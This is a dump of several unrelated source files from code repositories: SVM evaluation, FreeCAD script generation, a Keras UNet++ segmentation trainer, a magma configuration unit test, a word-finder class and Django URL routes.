for C in C_val:\n minDCF, _ = k_fold(D, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance)\n dcf_raw.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n f_in.write(\"\\nZ-normalized - no PCA\\n\")\n dcf_z = list()\n for C in C_val:\n minDCF, _ = k_fold(DN, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance)\n dcf_z.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n f_in.write(\"\\nGaussianized\\n\")\n dcf_gaus = list()\n for C in C_val:\n minDCF, _ = k_fold(DG, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance)\n dcf_gaus.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n if balance:\n imgName = \"SVM_linear_balanced.png\"\n else:\n imgName = \"SVM_linear_unbalanced.png\"\n\n plt.figure()\n plt.plot(C_val, dcf_raw, marker='o', linestyle='dashed', color=\"red\")\n plt.plot(C_val, dcf_z, marker='o', linestyle='dashed', color=\"blue\")\n plt.plot(C_val, dcf_gaus, marker='o', linestyle='dashed', color=\"green\")\n plt.xscale(\"log\")\n plt.xlabel(\"C\")\n plt.ylabel(\"min DCF\")\n plt.legend([\"Raw\", \"Z-normalized\", \"Gaussianized\"])\n plt.savefig(\"../Images/\" + imgName)\n print(\"Linear SVM \\t\\t DONE\")\n\n # Polynomial Kernel\n fileName = \"../Results/polynomial_SVM_results.txt\"\n with open(fileName, \"w\") as f_in:\n f_in.write(\"C Values:\\n1e-2 \\t1e-1 \\t1 \\t10 \\t100 \\n\")\n for balance in [False, True]:\n f_in.write(\"\\n\\nBalanced: \" + 
str(balance) + \"\\n\")\n f_in.write(\"\\nRAW\\n\")\n dcf_raw = list()\n for C in C_val:\n minDCF, _ = k_fold(D, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance,\n kernel=kernel_polynomial, args_kernel=[1, 2, K_SVM ** 0.5])\n dcf_raw.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n f_in.write(\"\\nZ-normalized - no PCA\\n\")\n dcf_z = list()\n for C in C_val:\n minDCF, _ = k_fold(DN, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance,\n kernel=kernel_polynomial, args_kernel=[1, 2, K_SVM ** 0.5])\n dcf_z.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n f_in.write(\"\\nGaussianized\\n\")\n dcf_gaus = list()\n for C in C_val:\n minDCF, _ = k_fold(DG, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance,\n kernel=kernel_polynomial, args_kernel=[1, 2, K_SVM ** 0.5])\n dcf_gaus.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n if balance:\n imgName = \"SVM_polynomial_balanced.png\"\n else:\n imgName = \"SVM_polynomial_unbalanced.png\"\n\n plt.figure()\n plt.plot(C_val, dcf_gaus, marker='o', linestyle='dashed', color=\"red\")\n\n plt.xscale(\"log\")\n plt.xlabel(\"C\")\n plt.ylabel(\"min DCF\")\n plt.savefig(\"../Images/\" + imgName)\n print(\"Quadratic SVM \\t\\t DONE\")\n\n # RBF Kernel\n fileName = \"../Results/RBG_SVM_results.txt\"\n gamma = [np.exp(-1), np.exp(-2)]\n\n with open(fileName, \"w\") as f_in:\n f_in.write(\"C Values:\\t1e-1 \\t1 \\t10 \\n\")\n for balance in [False, True]:\n f_in.write(\"\\n\\nBalanced: \" + str(balance) + \"\\n\")\n complete_z = list()\n complete_gaus = list()\n for g in gamma:\n f_in.write(\"\\n\\nGamma: \" + str(g) + \"\\n\")\n f_in.write(\"\\nZ-normalized - no PCA\\n\")\n dcf_z = list()\n for C in C_val:\n minDCF, _ = k_fold(DN, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM,\n balance=balance,\n kernel=kernel_rbf, args_kernel=[g, K_SVM ** 0.5])\n dcf_z.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n complete_z.append(dcf_z)\n\n if balance:\n img = \"SVM_RBF_balance.png\"\n else:\n img = \"SVM_RBF_unbalance.png\"\n\n plt.figure()\n plt.plot(C_val, complete_z[0], marker='o', linestyle='dashed', color=\"red\")\n plt.plot(C_val, complete_z[1], marker='o', linestyle='dashed', color=\"blue\")\n\n plt.xscale(\"log\")\n plt.xlabel(\"C\")\n plt.ylabel(\"min DCF\")\n plt.legend([r\"$log \\gamma = -1$\",\n r\"$log \\gamma = -2$\"])\n plt.savefig(\"../Images/\" + img)\n print(\"RBF SVM \\t\\t DONE\")\n\n","repo_name":"PietroMacori/machine-learning-exam","sub_path":"src/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":11682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"36019626040","text":"# 강의실 개수만 구했으~\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\n\ndp = [0] * 28\nrooms = []\nfor i in range(N):\n rooms.append(list(map(int, input().split())))\n\nrooms = sorted(rooms, key = lambda x: x[2])\ndata = [0] * (N+1)\n\nfor room in rooms:\n num, start, end = room\n for i in range(start, end + 1) :\n dp[i] += 1\n data[num] = max(dp)\n\nprint('필요한 강의실 출력')\nprint(max(dp))\n\nprint('강의 끝나는 순서대로 출력')\nprint(rooms)","repo_name":"jocy0412/jungle","sub_path":"jungle04/test/03_1379.py","file_name":"03_1379.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"34845188052","text":"# Step file ops\nimport members\nimport random\nimport colormaps\nfrom numpy import linspace\n\nimport openpyxl\nfrom openpyxl.utils.dataframe import 
dataframe_to_rows\n\nimport pandas as pd\n\n\n# make allpoint\n# p1 = FreeCAD.Vector(1000, 0, 0)\n\n# importHeader = [['import Draft, Arch']]\n\ndef pointCloud(reg):\n lst = []\n for i, point in enumerate(reg['Point']):\n lst.append(['p' + point.name + ' = FreeCAD.Vector' + '(' + str(round(point.x * 1000)) +\n ',' + str(round(point.y * 1000)) + ',' + str(round(point.z * 1000)) + ')'])\n return lst\n\n\ndef beamGen(reg, sections=False, colour=False):\n # sections = 50 makes all pipes with 50 diam\n lst = []\n\n for i, beam in enumerate(reg['Beam']):\n lst.append(['Line' + str(i) + ' = Draft.makeWire([' + 'p' + beam.start.name + ',p' + beam.end.name + '])'])\n if isinstance(sections, bool):\n if sections:\n if isinstance(beam.section, members.Tube):\n lst.append(['Arch.makePipe(Line' + str(i) + ',' + str(\n round(beam.section.diam * 10, 2)) + ').WallThickness=' + str(\n round(beam.section.thick * 10, 2))])\n # General pipe section for all beams\n elif isinstance(sections, list):\n lst.append(['Arch.makePipe(Line' + str(i) + ',' + str(sections[0]) + ')'])\n return lst\n\n\ndef beamgroup(reg, sections=True, colour=False, mix=False, export=False):\n lst = []\n # colour = (120, 120, 120)\n group_selection = ['BR1', 'HSP', 'JLT', 'LG1', 'LTR', 'PAD', 'SLE', 'VP', 'YK2', 'YK1']\n\n def coloursel(n, total=len(group_selection), colourmap=colormaps.Spectral, invert=False):\n # print(int(n / total * len(colourmap)))\n #\n sequence = linspace(0, len(colourmap) - 1, total)\n if invert:\n colourmap = colourmap[::-1]\n\n expanded_seq = [int(value) for value in sequence]\n print(len(colourmap), n, expanded_seq[n])\n\n return colourmap[expanded_seq[n]]\n\n if mix:\n size = len(group_selection)\n sequence = random.sample(list(range(size)), size)\n print(sequence)\n\n data = []\n for i, group in enumerate(reg['Group']):\n if group.name in group_selection:\n\n if colour:\n if mix:\n colour = coloursel(sequence[group_selection.index(group.name)])\n else:\n colour = coloursel(group_selection.index(group.name))\n print(colour)\n\n beam0 = group.elem[0]\n\n data.append([group.name, 'Group Name', 'Material', beam0.section.diam, beam0.section.thick, colour])\n\n for j, beam in enumerate(group.elem):\n if isinstance(beam.section, members.Tube):\n\n lst.append(\n ['Line0' + str(i) + str(\n j) + ' = Draft.makeWire([' + 'p' + beam.start.name + ',p' + beam.end.name + '])'])\n\n if sections:\n diameter = round(beam.section.diam * 10, 2)\n else:\n diameter = 30\n\n lst.append(['Pipe=Arch.makePipe(Line0' + str(i) + str(j) + ',' + str(diameter) + ')'])\n\n if sections:\n lst.append([f'Pipe.WallThickness={str(round(beam.section.thick * 10, 2))}'])\n\n lst.append([f'Pipe.ViewObject.ShapeColor = {colour}'])\n\n export_list_to_excel(data, 'output.xlsx')\n\n return lst\n\n # read from excel or txt - create folder with joints\n # export to abaqus #TODO MAYBE\n\n\ndef jointGen(reg, nodelst=None, inputfile='xls', sections=False, stub_len=2, folder=False):\n lst = []\n print(stub_len)\n # INPUT TYPE - xls,or txt\n if inputfile == 'xls':\n # get from excel\n print('excel')\n else:\n # get input from txt,csv\n print('Nodes from txt')\n # If not joints specified populates with all joints\n if nodelst is None:\n nodelst = []\n for joint in reg['Joint']:\n nodelst.append(joint.point.name)\n # DO for selected joints\n i = len(members.reg['Beam']) + 1\n print('entrou')\n for node_name in nodelst:\n for joint in reg['Joint']:\n # print(node_name,joint.point.name)\n if joint.point.name == node_name:\n for beam in joint.beams:\n # Check which 
stub length to use\n if hasattr(beam.section, \"diam\"):\n print('stub check')\n # print(stub_len*beam.section.diam*0.01,beam.length())\n\n # stub =stub_len * beam.section.diam * 0.01\n stub = min(beam.length(), 0.8)\n print('stub used', stub)\n if beam.start == joint.point:\n vec = members.Vector(beam.start, beam.end)\n else:\n vec = members.Vector(beam.end, beam.start)\n # print('vec',vec.dim)\n pivot = vec.node_along(point='A', dist=stub) # TODO not just for tubular\n # print('BeamA',beam.start.pos)\n # print('pivot',pivot.pos)\n # print('thickness',beam.section.thick)\n\n auxi = f'FreeCAD.Vector{tuple([round(x * 1000) for x in pivot.pos])}'\n lst.append([f'Line{i} = Draft.makeWire([p{joint.point.name},{auxi}])'])\n _str = f'Wire = Arch.makePipe(Line{i},{round(beam.section.diam * 10)},' \\\n f'{beam.section.thick * 10})'\n _str += f'.WallThickness={beam.section.thick * 10}'\n lst.append([_str])\n elif hasattr(beam.section, \"height\"):\n stub = str(stub_len * beam.section.height)\n else:\n stub = str(300)\n print(f'using default stub for {beam.section.name}')\n if folder:\n lst.append([f'folder.addObject(Wire)'])\n i += 1\n # ('aqui', lst)\n return lst\n\n # Line = Draft.makeWire([p1, p2, p3, p4])\n\n\ndef jointSpheres(reg, nodelst=None, diam=200, colour='saipem'):\n # nodelst=[]\n saipem = (0, 85, 127)\n transparency = 50\n lst = ['doc=FreeCAD.ActiveDocument']\n if nodelst is None:\n print('here')\n for i, joint in enumerate(members.reg['Joint']):\n if i > 5:\n return lst\n else:\n position = tuple([xyz * 1000 for xyz in joint.point.pos])\n lst.append([f'Sphere{i} = Part.makeSphere({diam * 0.5},FreeCAD.Vector{position})'])\n lst.append('sphere = doc.addObject(\"Part::Feature\", \"Sphere\")')\n lst.append(f'sphere.Shape = Sphere{i}')\n lst.append(f'sphere.ViewObject.ShapeColor = {saipem}')\n lst.append(f'sphere.ViewObject.Transparency = {transparency}')\n\n # print(lst)\n\n return lst\n\n\ndef jointLabels(reg, nodelst=None, delta_text=[0.5, 0, 1], sections=False):\n # nodelst=[]\n saipem = (0, 85, 127)\n white = (255, 255, 255)\n black = (0, 0, 0)\n colour = saipem\n transparency = 50\n lst = ['doc=FreeCAD.ActiveDocument']\n\n default_block = f'''\nlabel.ViewObject.FontSize = 350 # Set the default font size (adjust as needed)\nlabel.ViewObject.ArrowSize = 100 # Set the default arrow size (adjust as needed)\nlabel.ViewObject.ArrowType = \"Dot\" # Set the default arrow type (adjust as needed)\nlabel.ViewObject.TextColor = {black} # Set the default text color (black)\nlabel.ViewObject.LineColor = {black} # Set the default line color (black)\nlabel.ViewObject.FontName = \"Arial\" # Set the default font name (adjust as needed)\nlabel.ViewObject.Frame = 'Rectangle' '''\n\n # cases = {'1001': ['0001', '0002', '0007', '0004', '0005']}\n\n cases = {'1000': ['0089', '0053', '0170', '0164', '0075'],\n '2002': ['0064', '0067', '0077', '0070', '0048'],\n '3100': ['0048', '0056', '0055', '0169', '0057'],\n '3200': ['0048', '0059', '0056', '0055', '0169'],\n '3300': ['0048', '0056', '0055', '0057', '0058'],\n '3600': ['0048', '0056', '0055', '0058', '0057'],\n '4000': ['0089', '0170', '0053', '0164', '0075']}\n\n rotation = [f'rotation = FreeCAD.Rotation(FreeCAD.Vector(1.00, 0.00, 0.00), 90.00)']\n\n for case in cases:\n lst.append(f'\\nfolder = doc.addObject(\"App::DocumentObjectGroup\",\"CASE {case}\")')\n for node in cases[case]:\n node = members.get_obj(node, 'Point')\n text_position = tuple([(c1 + c2) * 1000 for c1, c2 in zip(node.pos, delta_text)])\n lst.append([f'position = FreeCAD.Vector{node 
* 1000}'])\n lst.append([f'txt_position = FreeCAD.Vector({text_position})'])\n lst.append(rotation)\n lst.append([f'txt_placement = FreeCAD.Placement(txt_position, rotation)'])\n lst.append([f'label = Draft.make_label(position, txt_placement, custom_text=\"{node.name}\", distance=-100)'])\n lst.append(default_block)\n lst.append(f'folder.addObject(label)')\n # lst.append(f'folder.addObject(label)')\n if sections:\n print('Sections')\n lst += jointGen(reg, cases[case], inputfile='xls', sections=True, stub_len=1, folder=False)\n\n # print(lst)\n return lst\n\n\ndef extendPoint(pointA, pointB, dist=0, mode=1):\n # modetypes=['fromA','fromB','middle']\n vec = members.Vector(pointA, pointB)\n if mode == 1:\n point = 'A'\n elif mode == 2:\n point = 'B'\n elif mode == 'middle': # TODO finish if necessary\n point = 'middle'\n\n return vec.node_along(point=point, dist=dist)\n\n\nimport openpyxl\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\ndef rgb_to_hex(rgb):\n return '%02x%02x%02x' % rgb\n\ndef export_list_to_excel(data_list, output_filename):\n # Create a DataFrame from the list\n df = pd.DataFrame(data_list,\n columns=['Group', 'Group Element', 'Material', 'Diameter', 'Thickness', 'Colour Code'])\n\n # Convert the RGB code to a string representation\n df['Colour Code'] = df['Colour Code'].apply(rgb_to_hex)\n\n # Create an Excel workbook and select the active sheet\n workbook = openpyxl.Workbook()\n sheet = workbook.active\n\n # Write the DataFrame to the sheet\n for row in dataframe_to_rows(df, index=False, header=True):\n sheet.append(row)\n\n # Apply fill color to the last cell of each row\n for row in sheet.iter_rows(min_row=2, max_row=sheet.max_row, min_col=sheet.max_column, max_col=sheet.max_column):\n cell = row[0]\n rgb_code = cell.value\n fill = openpyxl.styles.PatternFill(start_color=rgb_code, end_color=rgb_code, fill_type=\"solid\")\n cell.fill = fill\n\n # Save the workbook\n workbook.save(output_filename)\n","repo_name":"quintbythesea/FreecadNodesSACS","sub_path":"freecad.py","file_name":"freecad.py","file_ext":"py","file_size_in_byte":11003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7739914214","text":"from words import Word\nfrom location import Location\nl1 = Location(3, 5)\nw1 = Word(\"zebra\", \"HR\", l1)\nl2 = Location(-10, 10)\nw2 = Word(\"Panther\", \"DLD\", l2)\nl3 = Location()\nw3 = Word(\"GIRAFFE\", \"DRU\", l3)\nprint(w1)\nprint(w2)\nprint(w3)","repo_name":"smallrussian/CSC","sub_path":"python/wordstest.py","file_name":"wordstest.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"40693422993","text":"import os\nimport shutil\nimport subprocess\nfrom tempfile import mkdtemp\nfrom unittest import TestCase, main\nfrom unittest.mock import patch\n\nimport configlib\nimport utils.awslib\nimport yaml\nfrom utils.common import get_json\n\n\nclass TestConfigManager(TestCase):\n def setUp(self):\n self.root_dir = mkdtemp()\n self.constants = {\n 'project_dir': self.root_dir,\n 'config_dir': '%s/configs' % self.root_dir,\n 'vars_definition': '%s/vars.yml' % self.root_dir,\n 'components': ['infra', 'platform', 'service'],\n 'auto_tf': self.root_dir + '/terraform.tfvars.json',\n 'tf_dir': self.root_dir,\n 'main_tf': self.root_dir + '/main.tf',\n 'vars_tf': self.root_dir + '/vars.tf',\n }\n # add config directory\n os.makedirs(self.constants[\"config_dir\"])\n test_vars = {\n \"infra\": {\n 
\"aws_access_key_id\": {\n \"Required\": True,\n \"ConfigApps\": [\"awscli\"],\n },\n \"aws_secret_access_key\": {\n \"Required\": True,\n \"ConfigApps\": [\"awscli\"],\n },\n \"cluster_name\": {\n \"Required\": False,\n \"ConfigApps\": [\"tf\"],\n },\n \"secretsmanager_orc8r_secret\": {\n \"Required\": True,\n \"ConfigApps\": [\"tf\"],\n },\n },\n \"platform\": {\n \"deploy_elastic\": {\n \"Required\": False,\n \"ConfigApps\": [\"tf\"],\n },\n \"nms_db_password\": {\n \"Required\": True,\n \"ConfigApps\": [\"tf\"],\n },\n },\n \"service\": {\n \"lte_orc8r_chart_version\": {\n \"Required\": False,\n \"Default\": \"0.2.4\",\n \"ConfigApps\": [\"tf\"],\n },\n },\n }\n with open(self.constants['vars_definition'], 'w') as f:\n yaml.dump(test_vars, f)\n\n # write a simple jinja template file\n jinja_template = (\n '''\n{% for k in cfg['infra'] %}\n{{k}}=var.{{k}}{% endfor %}\n'''\n )\n with open(self.constants['tf_dir'] + '/main.tf.j2', 'w') as f:\n f.write(jinja_template)\n\n jinja_template = (\n '''\n{% for k in cfg %}\nvariable \"{{k}}\" {}{% endfor %}\n'''\n )\n with open(self.constants['tf_dir'] + '/vars.tf.j2', 'w') as f:\n f.write(jinja_template)\n\n def tearDown(self):\n shutil.rmtree(self.root_dir, ignore_errors=True)\n\n @patch(\"configlib.get_input\")\n @patch(\"utils.awslib.run_command\")\n def test_configure_sanity(self, mock_run_command, mock_get_input):\n mock_vals = {\n 'aws_access_key_id': 'foo',\n 'aws_secret_access_key': 'bar',\n 'secretsmanager_orc8r_secret': 'jar',\n }\n mock_get_input.side_effect = [\n mock_vals['aws_access_key_id'],\n mock_vals['aws_secret_access_key'],\n mock_vals['secretsmanager_orc8r_secret'],\n ]\n mock_run_command.return_value = subprocess.CompletedProcess(\n args=[], returncode=0,\n )\n\n # verify if components tfvars json is created\n mgr = configlib.ConfigManager(self.constants)\n mgr.configure('infra')\n mgr.commit('infra')\n\n # verify if configs are set in infra tfvars json\n fn = \"%s/infra.tfvars.json\" % self.constants['config_dir']\n cfg = get_json(fn)\n self.assertEqual(len(cfg.keys()), 3)\n self.assertEqual(cfg['aws_access_key_id'], \"foo\")\n self.assertEqual(cfg['aws_secret_access_key'], \"bar\")\n self.assertEqual(cfg['secretsmanager_orc8r_secret'], \"jar\")\n\n # check if aws configs are set\n aws_config_cmd = ['aws', 'configure', 'set']\n mock_run_command.assert_any_call(\n aws_config_cmd + ['aws_access_key_id', 'foo'],\n )\n mock_run_command.assert_any_call(\n aws_config_cmd + ['aws_secret_access_key', 'bar'],\n )\n\n # verify that platform tfvars json file isn't present\n fn = \"%s/platform.tfvars.json\" % self.constants['config_dir']\n self.assertEqual(os.path.isfile(fn), False)\n\n # reset mocks\n mock_get_input.reset_mock()\n mock_run_command.reset_mock()\n\n mock_vals = {\n 'nms_db_password': 'foo',\n }\n mock_get_input.side_effect = [\n mock_vals['nms_db_password'],\n ]\n\n # configure platform\n mgr.configure('platform')\n mgr.commit('platform')\n\n # verify that no aws call was invoked\n self.assertEqual(mock_run_command.call_count, 0)\n\n # check if we only invoked input for nms_db_password\n self.assertEqual(mock_get_input.call_count, 1)\n fn = \"%s/platform.tfvars.json\" % self.constants['config_dir']\n cfg = get_json(fn)\n self.assertEqual(len(cfg.keys()), 1)\n self.assertEqual(cfg['nms_db_password'], \"foo\")\n\n # verify that service tfvars json file isn't present\n fn = \"%s/service.tfvars.json\" % self.constants['config_dir']\n self.assertEqual(os.path.isfile(fn), False)\n\n # reset mocks\n 
mock_get_input.reset_mock()\n mock_run_command.reset_mock()\n\n # configure service\n mgr.configure('service')\n mgr.commit('service')\n\n # verify that no input or aws call was invoked\n self.assertEqual(mock_run_command.call_count, 0)\n self.assertEqual(mock_get_input.call_count, 0)\n\n fn = \"%s/service.tfvars.json\" % self.constants['config_dir']\n cfg = get_json(fn)\n\n # verify that default value was set\n self.assertEqual(len(cfg.keys()), 1)\n self.assertEqual(cfg['lte_orc8r_chart_version'], \"0.2.4\")\n\n # finally verify if all configs required by tf is present\n cfg = get_json(self.constants['auto_tf'])\n self.assertEqual(len(cfg.keys()), 3)\n self.assertEqual(cfg['secretsmanager_orc8r_secret'], \"jar\")\n self.assertEqual(cfg['nms_db_password'], \"foo\")\n self.assertEqual(cfg['lte_orc8r_chart_version'], \"0.2.4\")\n\n # verify if jinja template has been rendered accordingly\n with open(self.constants['main_tf']) as f:\n jinja_cfg = dict(\n ln.split('=')\n for ln in f.readlines() if ln.strip()\n )\n\n # all infra terraform keys should be present in the jinja template\n self.assertEqual(\n set(jinja_cfg.keys()),\n set(['secretsmanager_orc8r_secret']),\n )\n\n # variable tf is of the form variable \"var_name\" {}\n # get the middle element and remove the quotes\n with open(self.constants['vars_tf']) as f:\n jinja_cfg = [\n ln.split()[1][1:-1]\n for ln in f.readlines() if ln.strip()\n ]\n\n # all infra terraform keys should be present in the jinja template\n self.assertEqual(set(jinja_cfg), set(mgr.tf_vars))\n\n @patch(\"configlib.get_input\")\n @patch(\"utils.awslib.run_command\")\n def test_configure_set(self, mock_run_command, mock_get_input):\n mock_vals = {\n 'nms_db_password': 'foo',\n }\n mock_get_input.side_effect = [\n mock_vals['nms_db_password'],\n ]\n mock_run_command.return_value = 0\n\n # configure platform\n mgr = configlib.ConfigManager(self.constants)\n mgr.configure('platform')\n mgr.commit('platform')\n\n # check if we only invoked input for nms_db_password\n self.assertEqual(mock_get_input.call_count, 1)\n fn = \"%s/platform.tfvars.json\" % self.constants['config_dir']\n cfg = get_json(fn)\n self.assertEqual(len(cfg.keys()), 1)\n self.assertEqual(cfg['nms_db_password'], \"foo\")\n\n # set a specific variable\n mgr.set('platform', 'deploy_elastic', 'true')\n mgr.commit('platform')\n\n cfg = get_json(fn)\n self.assertEqual(len(cfg.keys()), 2)\n self.assertEqual(cfg['deploy_elastic'], \"true\")\n\n # finally verify if all configs required by tf is present\n cfg = get_json(self.constants['auto_tf'])\n self.assertEqual(len(cfg.keys()), 2)\n self.assertEqual(cfg['nms_db_password'], \"foo\")\n self.assertEqual(cfg['deploy_elastic'], \"true\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"magma/magma","sub_path":"orc8r/cloud/deploy/orc8r_deployer/docker/root/scripts/cli/configlib_test.py","file_name":"configlib_test.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","stars":1605,"dataset":"github-code","pt":"6"} +{"seq_id":"17673150807","text":"from collections import defaultdict\nfrom typing import List\nfrom tqdm import tqdm\nfrom chainer.finders.finder import Finder\nfrom chainer.finders.masked_indexer import MaskedIndexer\n\nvocab = [\n \"a\",\n \"b\",\n \"c\",\n \"ç\",\n \"d\",\n \"e\",\n \"f\",\n \"g\",\n \"h\",\n \"i\",\n \"j\",\n \"k\",\n \"l\",\n \"l·l\",\n \"m\",\n \"n\",\n \"o\",\n \"p\",\n \"q\",\n \"r\",\n \"s\",\n \"t\",\n \"u\",\n \"v\",\n \"w\",\n \"x\",\n \"y\",\n \"z\",\n]\n\n\nclass 
IntegratsFinder(Finder):\n    def __init__(self, words: set):\n        super().__init__(\".motcache/integrats.json\")\n        self.words = words\n        self.index = defaultdict(list)\n        self.indexer = MaskedIndexer(words)\n\n    def build_index(self, force: bool = False):\n        self.indexer.build_index(force)\n        self.index = self.indexer.index\n\n    def add_mask(self, word: str):\n        for index in range(len(word) + 1):\n            yield word[:index] + \"*\" + word[index:]\n\n    def find_words(self, word: str) -> List[str]:\n        ret = set()\n        for masked_word in self.add_mask(word):\n            if masked_word in self.index:\n                ret = ret.union(self.index[masked_word])\n        if len(ret) == 0:\n            return []\n        return list(key for key in ret if key != word)\n","repo_name":"ccoreilly/jocsdemots","sub_path":"chainer/finders/integrats.py","file_name":"integrats.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}{"seq_id":"21955329598","text":"import numpy as np\nfrom skimage.io import imread, imshow\nfrom skimage.transform import resize\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\nfrom model import Nest_Net\nfrom losses import dice_coef_loss_bce, dice_coef, hard_dice_coef, binary_crossentropy\nfrom my_tools import rle_encoding, rle_decode\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.optimizers import Adam\nfrom keras.models import load_model\nfrom keras.utils import Sequence\nfrom main import create_train_image_generator\n\n# https://drive.google.com/file/d/0B0d9ZiqAgFkiOHR1NTJhWVJMNEU/view\n# path = 'PicsArt/data/'\n# path = 'data/dataset1'\npath = '/media/danil/Data/Datasets/PicsArt/dataset1'\nBATCH = 12\ntarget_shape = (320, 240)\nsupervision = False\n\ndef load_train_data(path):\n    print('===LOAD DATA===')\n    train_images = os.listdir(os.path.join(path, 'images_prepped_train'))\n    train_images_list = [resize(imread(os.path.join(path, 'images_prepped_train', img)), target_shape) for img in train_images]\n    train_mask_list = [resize(imread(os.path.join(path, 'annotations_prepped_train', img)), target_shape) for img in train_images]\n    return np.array(train_images_list), np.expand_dims(np.array(train_mask_list),-1)\n\ndef load_test_data(path):\n    print('===LOAD TEST DATA===')\n    image_names = os.listdir(os.path.join(path, 'images_prepped_test'))\n    test_images_list = [resize(imread(os.path.join(path, 'images_prepped_test', img)),target_shape) for img in image_names]\n    test_mask_list = [resize(imread(os.path.join(path, 'annotations_prepped_test', img)), target_shape) for img in image_names]\n    return np.array(test_images_list), np.expand_dims(np.array(test_mask_list),-1)\n\ndef make_predict(model):\n    # load_test_data returns (images, masks); list the test directory separately for the file names\n    image_names = os.listdir(os.path.join(path, 'images_prepped_test'))\n    test_images_array, _ = load_test_data(path)\n    test_images_array = test_images_array / 255.\n    print('===PREDICT===')\n    predict_mask = model.predict(test_images_array, batch_size=1, verbose=1)\n    return test_images_array, predict_mask, image_names\n\ndef create_callbaks(model_name='unet++.h5'):\n    checkpoint = ModelCheckpoint('weights/' + model_name, monitor='val_loss', mode='min', save_best_only=True, verbose=1)\n    return [checkpoint]\n\nif __name__ == '__main__':\n    train_images, train_mask = load_train_data(path)\n    train_mask = (train_mask == 8./255).astype(float)\n\n    test_images, test_mask = load_test_data(path)\n    test_mask = (test_mask == 8./255).astype(float)\n\n    train_generator = 
create_train_image_generator((train_images*255).astype(np.uint8), (train_mask*255).astype(np.uint8), batch=BATCH, supervision = supervision)\n\n model = Nest_Net(320, 240, 3, deep_supervision=supervision)\n #model = load_model('weights/unet_with_car_data.h5', compile=False)\n\n if supervision:\n loss = {'output_1': binary_crossentropy,\n 'output_2': binary_crossentropy,\n 'output_3': binary_crossentropy,\n 'output_4': dice_coef_loss_bce}\n\n val_data = (test_images, {'output_1': test_mask,\n 'output_2': test_mask,\n 'output_3': test_mask,\n 'output_4': test_mask})\n metric = {'output_4': [dice_coef, hard_dice_coef, binary_crossentropy]}\n loss_weight = [0.25, 0.25, 0.5, 1.]\n else:\n loss = dice_coef_loss_bce\n val_data = (test_images, test_mask)\n metric = [dice_coef, hard_dice_coef, binary_crossentropy]\n loss_weight = [1.]\n\n model.compile(optimizer=Adam(1e-3), loss=loss, metrics=metric, loss_weights=loss_weight)\n callbacks = create_callbaks(model_name='unet_with_car_data.h5')\n\n print('===FIT MODEL===')\n model.fit_generator(train_generator,\n steps_per_epoch = train_images.shape[0]/BATCH,\n epochs=20,\n verbose=2,\n callbacks=callbacks,\n validation_data=val_data)\n \n model = load_model('weights/unet_with_car_data_supervision.h5', compile=False)\n model.compile(optimizer=Adam(1e-4), loss=loss, metrics=[dice_coef, hard_dice_coef, binary_crossentropy])\n model.fit_generator(train_generator,\n steps_per_epoch = train_images.shape[0]/BATCH,\n epochs=10,\n verbose=2,\n callbacks=callbacks,\n validation_data=val_data)\n\n x, y = next(train_generator)\n plt.figure()\n imshow(x[0])\n plt.show(block=False)\n plt.figure()\n imshow(y[0,...,0])\n plt.show(block=False)\n\n\n","repo_name":"Danil328/PicsArt","sub_path":"pretrain_model.py","file_name":"pretrain_model.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"1132055786","text":"from . 
import views\nfrom django.urls import path,register_converter\nimport logging\napp_name='YuceInfo'\n\n# class FilePath:\n# regex=\".*\"\n# def to_python(self,value):\n# logging.info(str(value))\n# return str(value)\n# def to_url(self,value):\n# logging.info(str(value))\n# return '%s'%str(value)\n#\n# register_converter(FilePath,'fp')\nurlpatterns=[\n path('', views.index),\n path('imageview//',views.fileview.imageview,name='imageview'),\n path('tableview//',views.fileview.tableview,name='tableview'),\n #项目管理的任务操作\n path('PMTaskHandle/pause/',views.pmtaskhandle.cmd), # 暂停操作 cmd:实验暂停 分析暂停\n path('PMTaskHandle/reset/',views.pmtaskhandle.reset), # 重置任务\n path('PMTaskHandle/go/', views.pmtaskhandle.go), # 保留项\n path('PMTaskHandle/modify/', views.pmtaskhandle.modify), # 任务修改\n path('PMTaskHandle/view/', views.pmtaskhandle.view), # 任务列表\n path('PMTaskHandle/stop/', views.pmtaskhandle.stop), #终止任务\n path('PMTaskHandle/cancel/', views.pmtaskhandle.cancel), # 取消操作 cmd: 取消实验 取消解读\n path('PMTaskHandle/allocate/', views.pmtaskhandle.allocate), # 任务分配\n\n\n # 分析师任务操作\n 